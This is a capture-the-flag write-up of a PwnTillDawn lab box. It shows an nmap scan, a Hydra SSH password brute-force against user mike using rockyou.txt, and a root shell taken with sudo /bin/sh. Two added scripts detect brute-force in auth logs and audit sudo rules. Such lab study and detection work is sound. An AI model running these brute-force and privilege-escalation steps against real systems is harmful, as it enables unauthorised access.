This will be a write-up on a PwnTillDawn Online Battlefield box, Stuntman Mike. Please check out the following links to find out more about PwnTillDawn Online Battlefield.
Nmap Scan
kali@kali:~$ sudo nmap -sC -sV -O 10.150.150.166
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 01:31 EST
Nmap scan report for 10.150.150.166
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey:
|   2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
|   256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_  256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after:  2022-10-24T09:15:13
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/22%OT=22%CT=1%CU=39741%PV=Y%DS=2%DC=I%G=Y%TM=5FBA05
OS:EC%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.67 seconds
Let’s look into port 22.
You could use Metasploit to enumerate the SSH username.
Just connecting to the IP through SSH reveals the username and the flag.
I was stuck trying to brute-force the username “stuntman mike” for hours…
My mind wasn't thinking straight and in the end, I decided to try using the username mike instead, as I had never really seen SSH usernames with spaces.
I used Hydra to brute-force the SSH user mike and very quickly got the password.
$ hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166 -V -f
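From the defender's side, a Hydra run like the one above leaves a very recognisable trail in sshd's auth log: a burst of "Failed password" lines for one or two usernames from a single source address, sometimes followed by an "Accepted password" from that same address. The script below is an added example, not part of the original write-up, that pulls that pattern out of auth.log-style lines. The log lines, the box hostname and the source addresses are constructed for the demo; the function itself works on real OpenSSH log lines in the same format.

```shell
#!/bin/sh
# Added example (not from the original write-up): detect an SSH password
# brute-force from OpenSSH auth.log lines.
# SAMPLE_AUTH_LOG is constructed: hostname "box", client 10.150.150.5/.9/.20
# and the port numbers are all assumptions made for this demo.
SAMPLE_AUTH_LOG='Nov 22 01:40:01 box sshd[2201]: Failed password for mike from 10.150.150.5 port 51002 ssh2
Nov 22 01:40:01 box sshd[2202]: Failed password for mike from 10.150.150.5 port 51003 ssh2
Nov 22 01:40:02 box sshd[2203]: Failed password for mike from 10.150.150.5 port 51004 ssh2
Nov 22 01:40:02 box sshd[2204]: Failed password for invalid user stuntman from 10.150.150.5 port 51005 ssh2
Nov 22 01:40:03 box sshd[2205]: Failed password for mike from 10.150.150.5 port 51006 ssh2
Nov 22 01:40:03 box sshd[2206]: Failed password for mike from 10.150.150.5 port 51007 ssh2
Nov 22 01:40:04 box sshd[2207]: Accepted password for mike from 10.150.150.5 port 51008 ssh2
Nov 22 01:41:10 box sshd[2310]: Failed password for root from 10.150.150.9 port 40001 ssh2
Nov 22 01:45:00 box sshd[2400]: Accepted publickey for mike from 10.150.150.20 port 40100 ssh2'

# ssh_bruteforce_report THRESHOLD   (reads auth log lines on stdin)
# Prints one line per source IP whose failed-password count reaches THRESHOLD:
#   <ip> <failed_count> <distinct_usernames_tried> <login_accepted_after_failures: yes|no>
ssh_bruteforce_report() {
    awk -v threshold="$1" '
        /sshd\[[0-9]+\]: Failed password for / {
            # source IP is the word after "from"; the user is the word after "for",
            # or three words after it when sshd logs "for invalid user <name>"
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            for (i = 1; i <= NF; i++) if ($i == "for") {
                user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
                break
            }
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        /sshd\[[0-9]+\]: Accepted (password|publickey) for / {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            # a successful login from a source that was already failing is the
            # worst case: the guessing most likely worked
            if (ip in fails) success[ip] = "yes"
        }
        END {
            for (ip in fails)
                if (fails[ip] >= threshold)
                    printf "%s %d %d %s\n", ip, fails[ip], users[ip], (ip in success) ? "yes" : "no"
        }'
}

# Demo run on the constructed log: report sources with 5 or more failures
printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_bruteforce_report 5
```

On a real host you would feed it `journalctl -u ssh` or `/var/log/auth.log` instead of the sample, and the single-source, single-username pattern with a "yes" in the last column is exactly what the Hydra run against mike produces.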
Now let's SSH in using the username mike.
You should be able to easily get the next flag, the user's flag, using the command ls.
Now, to get the root flag we will need to escalate our current privilege.
Using the command:
$ sudo -l
This command will allow us to list what commands we can run with root privileges.
From above we can see that we are able to run all commands with root privileges.
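The `(ALL : ALL) ALL` line that `sudo -l` prints here is the whole privilege-escalation story: the user can already run anything as root, so no trick is needed. The script below is an added example, not part of the original write-up, that reads `sudo -l` output and grades each rule so that an auditor can spot such grants on a fleet. The two `sudo -l` transcripts are constructed; the hostname stuntmanmike, the second user bob and the command paths in them are assumptions for the demo.

```shell
#!/bin/sh
# Added example (not from the original write-up): grade the command rules
# that `sudo -l` prints. Both transcripts below are constructed for the demo;
# the hostname "stuntmanmike", user "bob" and the command paths are assumptions.
SAMPLE_SUDO_L='Matching Defaults entries for mike on stuntmanmike:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mike may run the following commands on stuntmanmike:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/less /var/log/syslog
    (www-data) /usr/bin/systemctl restart apache2'

SAFE_SUDO_L='User bob may run the following commands on stuntmanmike:
    (root) /usr/bin/apt update'

# sudo_rules_audit   (reads `sudo -l` output on stdin)
# Prints "<LEVEL><TAB><rule>" per command rule:
#   HIGH   - run-as ALL/root with command ALL: full root, exactly what the box above has
#   MEDIUM - NOPASSWD on a specific command: root-level action without the user password
#   LOW    - a specific command that still needs the password
# Returns 1 when at least one HIGH rule exists, 0 otherwise.
sudo_rules_audit() {
    awk '
        /^User .* may run the following commands/ { inrules = 1; next }
        inrules && /^[[:space:]]*\(/ {
            rule = $0; sub(/^[[:space:]]+/, "", rule)
            # run-as part is the text inside the leading parentheses
            runas = rule; sub(/\).*/, "", runas); sub(/^\(/, "", runas)
            # command part is what follows, after stripping tags like NOPASSWD: / SETENV:
            cmds = rule; sub(/^\([^)]*\)[[:space:]]*/, "", cmds)
            while (sub(/^[A-Z]+:[[:space:]]*/, "", cmds)) {}
            level = "LOW"
            if (cmds == "ALL" && (runas ~ /^ALL/ || runas ~ /^root/)) level = "HIGH"
            else if (rule ~ /NOPASSWD:/) level = "MEDIUM"
            if (level == "HIGH") high++
            printf "%s\t%s\n", level, rule
        }
        END { if (high > 0) exit 1 }'
}

# Demo run on the constructed transcript of the box
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_rules_audit \
    || echo "at least one HIGH rule: this user can run any command as root"
```

The non-zero exit status makes the check easy to wire into a configuration-audit job: run `sudo -l -U <user>` as root on each host, pipe it through the function, and alert on the hosts where it returns 1.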
Using the command $ sudo /bin/sh, we should be able to easily get a root shell, meaning a shell with root privileges.
/bin/sh is basically just an executable file, just like ls, pwd, etc. These commands also have their respective executable files to do what they are supposed to do; for example, ls lists the files in a directory. sh itself executes commands from the command line string (read more here). So when you use the command sudo /bin/sh, it gives us a shell that has root privileges.
You should be able to get the root flag easily. Usually, for simple CTF challenges like this, the root flag is located in the root user's home directory (/root).